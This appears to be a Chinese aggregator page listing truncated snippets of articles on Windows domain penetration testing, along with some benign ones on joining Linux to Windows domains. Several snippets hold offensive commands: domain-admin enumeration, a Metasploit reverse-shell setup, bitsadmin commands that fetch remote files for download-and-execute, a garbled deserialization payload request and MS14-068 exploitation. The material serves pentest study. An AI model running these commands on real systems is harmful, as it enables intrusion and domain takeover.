首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
windows域渗透命令
2024-10-03
Windows常用内容渗透命令
假设现在已经拥有一台内网[域]机器,取名X-007. 1-1.内网[域]信息收集 A.本机X-007信息收集. [+]------用户列表[Windows用户列表/邮件用户/...] ---->分析Windows用户列表,不要忽略administrator. ---->分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户,例如:owa [+]------进程列表 ---->分析杀毒软件/安全监控工具等 ---->邮件客户端 ---->VPN等 [+]------服务列表
windows域渗透实战
测试环境 域控: 192.168.211.130 已经控制的机器: 192.168.211.133 获取网络信息 查看机器的网络信息 ipconfig /all # 查看 网卡信息,获取dns 服务器ip (域控) arp -a # 搜集内网信息 net view #查看网络中的机器 net view /domain # 查看网络中的域 net view /domain:domainhack # 查看 domainhack 域中的机器 通过 ping 机器名 可以获取 ip 查找 域控
AD域渗透总结
域渗透总结 学习并做了一段时间域网络渗透,给我直观的感受就是思路问题和耐心,这个不像技术研究,需要对一个点进行研究,而是遇到问题后要从多个方面思考,寻找"捷径"思路,只要思路正确,有足够有耐心,总会有所突破.现在将自己遇到的技术点及相关知识做一个总结,不足之处,请批评指正. -----一只萌新 域环境搭建不再详述,参考: > AD域环境的搭建 基于Server 2008 R2: http://www.it165.net/os/html/201306/5493.html >
将samba加入到windows域《转载》
将samba加入到windows域 那什么是域呢? 一台Windows计算机,它要么隶属于工作组,要么隶属于域.所以说到域,我们就不得不提一下工作组,工作组是MS的概念,一般的普遍称谓是对等网. 工作组(Work Group)就是将不同的电脑按功能分别列入不同的组中,以方便管理.比如在一个网络内,可能有成百上千台工作电脑,如果这些电脑不进行分组,都列在“网上邻居”内,可想而知会有多么乱. 与工作组有所不同,域(domain)是一个相对严格的组织,至少需要一台安装了windwos NT/2000/
linux加入windows域之完美方案(转载)
概念理解:1.kdc:可信任的密钥分发中心(KDC, Key Distribution Center).2.Winbind是Samba套件的功能之一.它允许Unix系统利用Windows NT的用户帐号信息.winbind验证器是Samba winbindd服务进程的客户端.在使用该验证器之前,必须安装Samba和运行winbindd 服务.# /etc/init.d/winbind start3.smb.conf:samba主配置文件4./etc/krb5.conf:Kerberos用于身份认
初级AD域渗透系列
net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admins” /domain 获得企业管理员列表 net localgroup administrators /domain 获取域内置administrators组用户,这个组内成员包含enterprise admins与domain admins,权限一样 net group “domain cont
windows下wmic命令
转载 https://www.cnblogs.com/archoncap/p/5400769.html 第一次执行WMIC命令时,Windows首先要安装WMIC,然后显示出WMIC的命令行提示符.在WMIC命令行提示符上,命令以交互的方式执行 执行“wmic”命令启动WMIC命令行环境.这个命令可以在XP或 .NET Server的标准命令行解释器(cmd.exe).Telnet会话或“运行”对话框中执行.这些启动方法可以在本地使用,也可以通过.NET Server终端服务会话使用. 第一次执
Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具
网络漏洞攻击工具 Metasploit 先msfupdate升级: 然后选择msfconsole: 接下来: set LHOST 本机IP地址 setLPORT setg PAYLOAD windows/shell/reverse_tcp setg RHOST 目标IP地址 setg port set target 随意数字 exploit 这样就可以反弹一个cmd shell了. 密码破解 Hydra 多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,s
Metasploit域渗透测试全程实录(终结篇)
本文作者:i春秋签约作家——shuteer 前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里.于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求.今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来.相关知识点总结如下: 免杀payload的生成,请使用Veil msf在meterpreter下的提权尝试 msf在meterpreter下的bypassuac尝试 内网渗透测试过程中的
windows 域的安装方法
前面的博客中我们知道了 Windows AD域的升级,下面我谈谈Windows域的安装和卸载. 卸载AD域 配置备份AD域 安装子域 删除子域(必须在根域管理员模式下删除,否则无法删除) 删除命令 导入删除 Dcpromo命令解析 windows 域的安装方法就讲完了,如有错误请指正.
windows下载执行命令大全
1.bitsadmin命令(只能命令下载到指定路径上,win7以上): bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg" bitsadmin /transfer d90f http://site.com/a %APPD
bat(续六)-windows批处理set命令
windows批处理set命令 [设置变量]格式:set 变量名=变量值详细:被设定的变量以%变量名%引用 [取消变量]格式:set 变量名=详细:取消后的变量若被引用%变量名%将为空 [展示变量]格式:set 变量名详细:展示以变量名开头的所有变量的值 [列出所有可用的变量]格式:set [计算器]格式:set /a 表达式示例:set /a 1+2*3 输出 7 !注意!set不能用在复合语句里面比如if 1==1 set a=2或者for %%i in (a) do set a=2 预定义
CentOS加入Windows域
CentOS加入Windows域,为减少操作已经提前关掉了selinux,防火墙.并且更改了主机名 yum install nss-pam-ldapd -y 第一步:更改主机名为linux.itxdm.me 第二步:确定Setup内左边Winbind,右边Kerberos,以及Winbind Authentication开启 第三步:确定realm(领域)为大写域址,并且KDC指向域控机器的88端口(注意,resolve配置文件应该提前填入DNS) 第四步:确定Domain这里是ITXDM.R
在Ubuntu 12.04 LTS下成功访问Windows域共享(mount //192.168.1.102/share -o user=DOMIAN\\user,pass=passwd /mnt)
Ubuntu 12.04 LTS下成功访问Windows域共享: 1,在命令行模式下 mount //192.168.1.102/share -o user=DOMIAN\\user,pass=passwd /mnt 注意有两点 (1),domain这里是域名,并且要大写 (2),这里有两个\\,其中第一个是转义符,第二个是\ 2,图形模式下 打开主文件夹,按Ctrl+l,输入smb://192.168.1.102即可--------------------- 作者:cl2006ky 来源:CS
火眼推出Windows免费渗透测试套件,包含140多款工具
火眼推出Windows免费渗透测试套件,包含140多款工具 2019年3月28日,火眼发布了一个包含超过140个开源Windows渗透工具包,红队渗透测试员和蓝队防御人员均拥有了顶级侦察与漏洞利用程序集.该工具集名为“CommandoVM”. 安全工作者在对系统环境进行渗透测试时常常会自己配置虚拟机,如果是Linux的话还好,还有Kali Linux可以用.但是碰上Windows环境就惨了,往往配置虚拟机环境就要好几个小时.一边要维护自定义的虚拟机环境,一边还要时常升级集成的工具套件,花费的时间
域渗透-Kerberos协议中spn的应用
0x01 关于SPN 服务主体名称(SPN)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称. 服务主体名称是服务实例(可以理解为一个服务,比如 HTTP.MSSQL)的唯一标识符.Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联. 在内部网络中,SPN扫描通过 查询向域控制器执行服务发现.这对于红队而言,可以帮助他们识别正在运行重要服务的主机,如终端.交换机.微软SQL等,并隐藏他们.此外,SPN的识别也是kerberoasting攻击的
域渗透基础之NTLM认证协议
域渗透基础的两个认证协议ntlm和Kerberos协议是必须总结的~ 这篇简单总结下ntlm协议 晚上写下kerberos 0x01 NTLM简介 NTLM使用在Windows NT和Windows 2000 Server(or later)工作组环境中(Kerberos用在域模式下).在AD域环境中,如果需要认证Windows NT系统,也必须采用NTLM.较之Kerberos,基于NTLM的认证过程要简单很多.NTLM采用一种质询/应答(Challenge/Response)消息交换模式.
域渗透复盘(安洵CTF线下)
复盘线下域渗透环境Write Up 0x01 外网web到DMZ进域 外网web入口 joomla应用 192.168.0.5 反序列化打下来 GET /index.php HTTP/1.1 Host: 192.168.0.5 User-Agent: Mozilla/ Firefox/30.0 x-forwarded-::{s::::{}s:::{i:;a::{i:;O:::{s::::{}s::::::;s::::{}}i:;s:::;}ð Accept: text/html,app
内网域渗透之MS14-068复现(CVE-2014-6324)
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务器权限. MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测. systeminfo |find "3011780" 如下,为空说明该服务器存在MS14-068漏洞. 存在如下拓扑图: 域用户hack在域成员主机A上登录过,我们已经获得
内网域渗透之MS14-068复现
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务器权限. MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测 systeminfo |find "3011780" 如下,为空说明该服务器存在MS14-068漏洞. 存在如下拓扑图: 域用户hack在域成员主机A上登录过,域成员主机A的
热门专题
windows允许某个网段访问配置文件
linux hidraw 权限
sqlyog导出alter table
abp core vnexe swagger 没有权限
kettle合并增量同步
java word 转pdf失真
普罗米修斯监控 redis 设置密码
docker容器内vim无法复制
java 微信公众号采集
devexpress chartcontrol 设置不同y轴
gdb 调试 二进制
unity 设置鼠标样子
特征的可能性假设为高斯
安装SilverLight出现404
myeclipse debug 进去断点不是源文件
ubuntu查看硬盘信息命令
p-value对显著性的影响
c语言可以用char类型进行判断吗
FPGA器件有多少个门数
esp8266 wifi继电器 火线